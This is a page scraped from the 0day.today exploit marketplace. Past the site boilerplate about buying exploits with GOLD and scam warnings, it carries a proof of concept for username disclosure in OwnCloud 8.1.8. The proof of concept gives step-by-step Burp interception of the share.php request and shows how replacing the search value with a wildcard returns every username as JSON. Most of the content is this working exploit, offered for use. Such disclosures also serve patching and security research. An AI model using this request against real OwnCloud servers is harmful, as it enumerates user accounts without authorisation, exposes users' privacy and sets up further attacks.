0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
OwnCloud 8.1.8 - Username Disclosure Vulnerability
# Exploit Title: OwnCloud 8.1.8 - Username Disclosure # Exploit Author : Daniel Moreno # Vendor Homepage : https://owncloud.org/ # Link Software : https://ftp.icm.edu.pl/packages/owncloud/ (old version. Download at your own risk) # Tested on OS: CentOS # PoC: # 1. Create an account in OwnCloud # 2. Intercept connection with Burp # 3. Share a file, typing anything --------------------------------------------------------- 4. Burp will capture this request GET /index.php/core/ajax/share.php?fetch=getShareWith&*search=bla*&limit=200&itemType=file HTTP/1.1 Host: XXXXXXXXXXXXX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: */* Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate requesttoken: XXXXXXXXXXXXXXXXXXX OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Connection: close Referer: https://domain.com/index.php/apps/files/ Cookie: XXXXXXXXXXXXXXXX --------------------------------------------------------------------- 5. Send to Repeater 6. Change GET parameter to THIS: GET /index.php/core/ajax/share.php?fetch=getShareWith&*search=*&limit=200&itemType=file HTTP/1.1 7. Return valeus will be a JSON with all username informations # 0day.today [2024-11-15] #